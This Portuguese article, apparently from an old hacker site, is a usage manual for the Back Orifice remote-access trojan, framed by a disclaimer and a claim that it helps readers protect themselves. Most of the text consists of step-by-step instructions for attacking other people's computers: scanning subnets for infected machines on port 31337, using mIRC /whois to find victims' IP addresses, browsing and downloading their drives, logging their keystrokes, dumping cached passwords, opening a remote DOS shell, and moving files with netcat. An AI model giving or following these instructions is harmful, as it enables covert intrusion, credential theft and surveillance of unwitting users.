ADVERTÊNCIA!

O CONTEÚDO DESTE DOCUMENTO DESTINA-SE A INFORMAÇÃO APENAS. OS ATOS PRATICADOS APÓS A LEITURA DO MESMO, SÃO DE INTEIRA RESPONSABILIDADE DO LEITOR.

 

Algumas palavras de esclarecimento:

É crescente, o interesse por um assunto ou conceito denominado Hacker. O significado da palavra Hacker foi deturpado com os anos. Originalmente, Hacker se referia aos grandes programadores de computador, verdadeiros magos de sistemas operacionais, tais como Unix e VMS, que literalmente testavam a segurança destes sistemas. Não com o objetivo infantil de destruir, apagar ou alterar o conteúdo dos mesmos. E sim, auxiliar o aprimoramento da segurança das informações nestes sistemas.

Hoje, todos se acham Hackers pelo simples fato de querem ser. Utilizam scripts do mIRC para incomodar outros usuários, lêem todos os textos sobre invasão de sistemas, na esperança de que ao final, tenham aprendido tudo sobre o tema.

Primeiro de tudo! niguém vai ensiná-lo a ser um Hacker, pelo simples fato de que, dificilmente você encontrará um. A polícia e agências de segurança do mundo inteiro não conseguiram encontrá-los. E, certamente, não será você o primeiro a fazê-lo! E se por um milagre qualquer, você se depara-se com um. Certamente ele não o ensinaria absolutamente nada. Principalmente por que não existe uma receita mágica do conhecimento. Assim como existem os Ronaldinhos e Romários no futebol, que nunca precisaram de escolinhas de futebol. Existem também os craques de sistemas, como Kevin Mitnick (acabou preso!) que nunca frequentou um curso de informática. Simplesmente, era autodidata. Em sua casa foram encontrados centenas de livros sobre os principais sistemas operacionais (VMS e UNIX) e seu conhecimento se deve a sua incessante necessidade de informação, de conhecimento.

Se você pensa em adquirir conhecimento em alguma tecnologia de computador, digo alguma, pois um Hacker de verdade, provavelmente você não será. Do contrário você já seria um e não precisaria estar lendo este artigo. Comece por visitar a livraria mais próxima e se abasteça de algums bons livros, não aqueles pequenos cursos rápidos, e sim, aquelas bíblias mesmo! Leia o tutorial Como se Tornar um Hacker para um melhor entendimento.

Por fim, gostaria de dizer. Apagar arquivos, formatar o HD, ou seja, "avacalhar" as máquinas de usuários de Windows como você, não é ser um Hacker! Mas como tudo o que é proibido, gera curiosidade, divulgo o manual do programa Back Orifice para que todos, saibam como usa-lo e com isso a se previnirem.

 

O que é o Back Orifice ?

O Back Orifice ou simplesmente BO, é um aplicatico cliente/servidor apenas para Windows 95 e 98, que permite ao cliente monitorar e administrar a máquina rodando o servidor. Pode ser considerado como um Cavalo de Troia.

 

Quem criou o Back Orifice ?

O criador do Back Orifice, é um grupo Hacker chamado Cult of Dead Cow ou Culto da Vaca Morta.

 

Como ele funciona ?

Assim como um browser conecta-se a um servidor da Internet para a visualização de uma home page, compreendendo uma máquina cliente e outra servidora, respectivamente. Assim é o Back Orifice, que utiliza-se dos mesmos processos. A máquina que roda a versão cliente, pode conectar-se com uma máquina que roda a versão servidora.

 

Quem são os servidores e quem são os clientes ?

Na grande maioria dos casos, a versão servidora é rodada em uma máquina por simples descuido. Pois, acredito, que ninguém gostaria de disponibilizar seus arquivos pessoais para algumas milhares de pessoas no mundo. Como o programa BO vem compactado, contendo além de alguns utilitários, as versões cliente e servidor. O usuário pode executar a versão errada (servidor), simplesmente por não ter lido ou entendido as instruções. Mas lembra-mos que, quem está rodando o servidor do Back Orifice, pelo menos, tentou rodar a versão cliente para, talvez, divertir-se com a máquina dos outros. E acabou tornando a si próprio, o brinquedo dos outros.

E para isto, basta um simples clique no mouse. E o servidor se instala em sua máquina sem nada mostrar-lhe e em seguida se apaga e passa a funcionar como um serviço do Windows. E a cada vez que você ligar o seu micro, o servidor se inicia sem que ninguém perceba. Ele funciona como um pano de fundo e não deixa nenhum rastro.

O servidor do Back Orifice pode vir encoberto por um outro arquivo qualquer, e ao ser executado se instala na sua máquina, sem nenhum sinal. E uma vez rodando, o faz de uma forma que torna difícil a sua detecção. Permite ao administrador remoto tomar o controle de seu sistema: roubar suas senhas, enviar ou receber arquivos, rodar novas aplicações, observar e derrubar qualquer aplicação que você esteja rodando, e etc,... e sem o seu conhecimento ou consentimento.

 

Especificações:

O pacote bo.zip contém:

bo.txt - este documento.

plugin.txt - a ajuda para programação de plugin.

boserve.exe - o auto-instalador do Back Orifice (BO).

bogui.exe - o cliente modo gráfico (GUI) do Back Orifice.

boclient.exe - o cliente modo texto do Back Orifice.

boconfig.exe - utilitário de configuração de nome do executável, porta, senha e plugins do servidor BO.

melt.exe - descompacta arquivos compactados com o comando "freeze".

freeze.exe - compacta arquivos que podem ser descompactados com o comando "melt".

 

Comandos:

Abordaremos a versão Bogui.exe (modo gráfico), por ser de melhor manuseio. Mas os comandos possuem a mesma sintaxe entre as duas gráfica e texto.

Gui/texto:

App add/appadd - abre e redireciona um aplicativo modo texto para uma porta tcp. Isso permite que você controle o aplicativo modo texto ou modo dos (como command.com) via telnet.

App del/appdel - desliga o redirecionamento de um aplicativo.

Apps list/applist - lista os aplicativos atualmente conectados.

Directory create/md - cria diretório.

Directory list/dir - lista arquivos e diretórios. Você deve especificar um curinga caso queira que mais de um arquivo seja listado.

Directory remove/rd - remove um diretório.

Export add/shareadd - compartilha um diretório ou drive do servidor em rede. O ícone diretório ou drive compartilhado não é alterado.

Export delete/sharedel - remove um compartilhamento.

Exports list/sharelist - lista os compartilhamentos, o drive ou diretório que está sendo compartilhado, os acessos e a senha do compartilhamento.

File copy/copy - copia um arquivo.

File delete/del - remove um arquivo.

File find/find - procura no diretório arquivos que coincidam com a especificação curinga.

File freeze/freeze - compacta um arquivo.

File melt/melt - descompacta um arquivo.

File view/view - visualiza o conteúdo de um documento texto.

HTTP Disable/httpoff - desabilita o servidor http.

HTTP Enable/httpon - habilita o servidor http.

Keylog begin/keylog - registra o texto digitado no servidor em um arquivo texto. O log mostra o nome da janela em que o texto foi digitado.

Keylog end - interrompe o registro de texto digitado. Para utilizar esse comando no modo texto, use o comando "keylog stop".

MM Capture avi/capavi - captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.

MM Capture frame/capframe - captura um quadro de vídeo de um dispositivo de captura de vídeo para um arquivo bitmap.

MM Capture screen/capscreen - captura uma imagem da tela do servidor para um arquivo bitmap.

MM List capture devices/listcaps - lista os dispositivos de captura de vídeo.

MM Play sound/sound - toca um arquivo wav no servidor.

Net connections/netlist - lista as conexões de entrada e saída da rede.

Net delete/netdisconnect - desconecta o servidor de uma rede.

Net use/netconnect - conecta o servidor em uma rede.

Net view/netview - lista todas as interfaces de rede, domínios, servidores e envios do servidor.

Ping host/ping - testa a conexão com a máquina remota. Informa o nome da máquina e a versão do BO.

Plugin execute/pluginexec - executa um plugin do Back Orifice. Executar funções não entendidas pelo plugin pode fazer com que o servidor trave.

Plugin kill/pluginkill - desliga um plugin.

Plugins list/pluginlist - lista plugins ativos ou avisa de que um plugin foi desligado.

Process kill/prockill - termina um processo.

Process list/proclist - lista processos rodando.

Process spawn/procspawn - abre um programa. Pelo GUI, se o segundo parâmetro é especificado, o processo será executado normalmente e visível. Caso contrário ele será executado de maneira invisível.

Redir add/rediradd - redireciona recebimento de conexões tcp ou pacotes udp para outro endereço ip.

Redir del/redirdel - interrompe o redirecionamento de uma porta.

Redir list/redirlist - lista os redirecionamentos de portas ativos.

Reg create key/regmakekey - cria uma chave no registro. NOTA: Para todos os comandos de registro, não especificar a \\ inicial de valores de registro.

Reg delete key/regdelkey - remove uma chave no registro.

Reg delete value/regdelval - remove um valor no registro.

Reg list keys/reglistkeys - lista as sub-chaves de uma chave de registro.

Reg list values/reglistvals - lista os valores de uma chave de registro.

Reg set value/regsetval - define um valor para uma chave de registro. Os valores são especificados no formato tipo vírgula valor. Para valores binários (tipo B) o valor é um série de dois dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um número decimal. Para valores string (tipo S) o valor é uma string de texto.

Resolve host/resolve - determina o endereço ip de uma máquina em relação à máquina servidor. O nome da máquina pode ser um "host name" ou o nome de uma máquina em rede local.

System dialogbox/dialog - cria uma caixa de diálogo no servidor com o texto informado e um botão "ok". Você pode criar quantas caixas de diálogo quiser, elas aparecerão em cascata umas sobre as outras.

System info/info - exibe as informações do sistema da máquina servidor. Os dados exibidos incluem nome da máquina, usuário, tipo de cpu, memória total e disponível, dados sobre a versão de Windows e informações sobre os drives, incluindo tipo (fixo, cd-rom, removível ou remoto) e, nos drives fixos, o tamanho e espaço disponível do drive.

System lockup/lockup - trava a máquina servidor.

System passwords/passes - exibe as senhas cacheadas e a senha do protetor de tela. As senhas podem apresentar caracteres estranhos no fim.

System reboot/reboot - desliga o servidor e reinicia a máquina.

TCP file receive/tcprecv - conecta o servidor a um ip e porta específicos e grava qualquer dado recebido por aquela conexão em um arquivo.

TCP file send/tcpsend - conecta o servidor a um ip e porta específicos, envia o conteúdo do arquivo especificado e o desconecta. Arquivos podem ser transferidos _do_ servidor usando-se o comando "tcp file send" e o utilitário netcat com os parâmetros: netcat -l -p 666 > arquivo Arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file receive" e o utilitário netcat com os parâmetros: netcat -l -p 666 < arquivo NOTA: A versão para Windows do netcat não desconcerta nem se finaliza quando atinge o final da transmissão. Após o término, finalize o netcat com ctrl+c ou ctrl+break.

BOConfig: BOconfig.exe permite configurar as opções de um boserve.exe antes que ele seja instalado. Ele requisitará: Runtime executable name O nome do arquivo que o Back Orifice se instalará no diretório system do Windows. O nome não precisa tem a extensão exe, ela será automaticamente adicionada. Exe description in registry A descrição do executável do Back Orifice no registro do Windows, de onde ele será executado sempre que o Windows se iniciar. Server port A porta em que o servidor será acessado. Encryption password A senha de acesso ao servidor. Não é obrigatória e pode ser deixada em branco. Default plugin to run on startup O plugin do Back Orifice a ser executado ao iniciar. File to attach Arquivo a ser anexado ao boserve.exe. Ele pode ser um plugin, que será automaticamente iniciado com o boserve.exe. NOTA: Se o servidor não for configurado com o BOconfig.exe, ele se comunicará na porta 31337 sem senha, e se instalará como " .exe".

 

Manual:

Como encontrar uma máquina rodando o servidor do Back Orifice ?

Você pode fazê-lo de duas formas. A primeira é digitando o endereço de uma sub-rede na pequena caixa no canto superior esquerdo. Ex. 195.219.222.* e pressionando "ENTER". Isto fará com que o Back Orifice procure por todos os endereços IP do 195.219.222.0 até o 195.219.222.255.

Você pode também abrir o NOTEPAD e criar uma lista de sub-redes (uma por linha), salvá-la no mesmo diretório do Bogui.exe e então, pressionar o botão PING no canto inferior esquerdo da janela.

Agora digite o nome do arquivo que você criou na caixa de texto que surgirá.

O Back Orifice irá então, buscar todas as sub-redes do arquivo.

 

Como saberei que o Back Orifice encontrou uma máquina rodando o servidor ?

Quando o Back Orifice detectar uma máquina rodando o servidor, ele irá mostrar uma mensagem como esta:

------------ Packet received from host 195.130.131.69 port 31337 -------------!PONG!1.20!DEFAULT! _________________________________________ ------------------------ End of Data -----------------------

 

 

Que significa: "Pacote recebido do host (endereço IP dp servidor) 195.130.131.69 porta 31337". "PONG, significa a resposta ao seu comando PING. O número 1.20 indica a versão do servidor Back Orifice e o nome DEFAULT, é o nome do computador-servidor".

Digite o endereço IP completo, encontrado na mesma caixa de texto superior esquerda para começar a executar os comandos.

(Uma boa forma de encontrar endereços IP`s é no mIRC, através do comando /whois "nick")

 

Como posso ver e baixar os arquivos do winchester do servidor ?

Nada mais fácil! Apenas selecione o comando "HTTP Enable" na janela do Bogui, digite "80" (ou outro número) na caixa de texto "port" e "c:" (ou outra letra do drive) na caixa "root". Então, pressione o botão "send".

Você deverá ver uma mensagem como esta:

** 15:HTTP Enable packet sent (25 bytes) val1: '80' val2: 'c:'_______________ ----------- Packet received from host 195.130.131.69 port 31337 --------------HTTP server listening on port 80_____________________________________ ------------------------- End of Data ------------------------

 

 

Agora simplesmente, abra um Browser (Netscape Navigator funciona melhor neste caso, mas o Internet Explorer também se sairá bem). No campo de endereço, digite "http://endereçodeip". No caso acima, seria "http://195.130.131.69".

Se você utilizou um número diferente de "80" para a porta, então adicione-o ao endereço de IP. Ex. "http://195.130.131.69:3000".

Pronto! Agora você poderá visualizar o conteúdo do drive C:\ do servidor na janela de seu browser. Clicando em um diretório, você será transferido para ele. Clicando nos arquivos, você os baixará.

OBS: O ideal é digitar os nomes de arquivo ou diretórios que se quer acessar ou baixar, no campo do endereço. E também é necessário respeitar os 8 caracteres para nomes de arquivos ou diretórios. Por exemplo: Se você deseja acessar o diretório "C:\WINDOWS\MEUS DOCUMENTOS". Você deverá digitar no campo de endereço: "http://195.131.131.69/windows/meusdo~1". É a mesma regra do DOS.

 

Como posso enviar arquivos para o servidor ?

Siga o mesmo procedimento acima. Quando o conteúdo do drive especificado aparecer em seu browser, role-o até a parte inferior. Você notará dois botões e uma caixa de texto. No botão "browser" ou "procurar", você irá especificar que arquivo da sua máquina, você quer enviar. Após selecioná-lo, clique em upload para enviá-lo.

OBS: Em nem todos os casos este procedimento funciona. Pode-se utilizar também o utilitário NETCAT para o envio de arquivos, através do comando.

para enviar: "nc -l -p 666<nomedoarquivo"

para receber: "nc -l -p 666>nomedoarquivo"

* O número 666 representa a porta, podendo ser mudado.

 

Veja o que o usuário do servidor está digitando.

Para realizar esta função, você precisa selecionar o comando "Keylog begin" na janela do seu Back Orifice. Na caixa de texto "filename", digite o nome de um arquivo que você deseja armazenar os registros. Você pode escolher qualquer nome, mas é recomendável que se utilize uma extensão .txt (texto), pelo fato de que este tipo de arquivo pode ser facilmente visualizado pelo seu browser. No exemplo abaixo, o arquivo foi chamado de "system.txt".

** 17:Keylog begin packet sent (29 bytes) val1: 'system.txt' val2: 'c:'__________ ---------- Packet received from host 195.130.131.69 port 31337 --------------- Logging keys ___________________________________________________ ------------------------- End of Data -------------------

 

 

Após isto, execute o comando "File find" com o nome do arquivo em uma caixa de texto e "c:" em outra. Isto resultará em algo como:

** 32:File find packet sent (31 bytes) val1: 'system.txt' val2: 'c:'______________ ---------- Packet received from host 194.119.236.190 port 31337 ------------- Searching for file 'system.txt from root 'c:':______________________________ SYSTEM.TXT 49 -A----- 08-23-98 23:17 c:\Program Files\ICQ\system.txt __ End of search __________________________________________________ --------------------------- End of Data -------------------------

 

 

 

Isto lhe dará uma lista de todos os locais onde existirem arquivos de "system.txt". Abra uma janela do seu browser e abra o arquivo que você verá tudo o que o usuário do servidor esteve digitando.

OBS: Talvez o arquivo só apareça quando a gravação dos registros for interrompida. Neste caso, clique no comando "Keylog end" na janela do seu Back Orifice.

 

Veja as senhas do usuário armazenadas no servidor.

Talvez esta seja a mais simples das funções. Apenas clique no comando "System passwords" e pronto, as senhas aparecerão para você!

 

Como abrir um prompt do DOS na máquina servidora.

Para fazê-lo, você precisa selecionar o primeiro comando da lista na janela do seu Back Orifice, "App add". Não caixa de texto, digite "command.com" e na segunda caixa de texto digite, "23".

Agora, você precisa abrir uma sessão do TELNET na sua máquina. Pressione o botão INICIAR do seu computador e em seguida, clique em EXECUTAR. Digite TELNET e o programa irá se iniciar.

Clique no menu "Connect" e escolha o primeiro item "Remote system". Uma pequena janela irá surgir, com três caixas.

Apenas digite o endereço IP da máquina servidora no campo "Host Name". Então pressione o botão "Connect". Após alguns segundos, o prompt do DOS irá aparecer na janela do TELNET. Você pode agora usar os comandos do DOS no servidor. (dir, cd, copy,...)

 

Mande mensagens na tela do servidor.

Selecione o comando "System Dialogbox". Na caixa de texto "title", digite o título que você deseja que apareça na caixa de diálogo. Na caixa de texto "text", digite o texto da mensagem. Então pressione o botão "send" e você deverá ver uma confirmação do envio da mensagem.

 

Capture a tela do usuário em um arquivo .BMP.

Você pode salvar em um arquivo a tela capturada da máquina servidora. Selecione o comando "MM capture screen". Na caixa de texto a esquerda, digite o nome de um arquivo qualquer com extensão .BMP e então clique no botão "send". Você deverá receber uma confirmação do comando, então o arquivo .BMP estará na máquina servidora podendo ser baixado.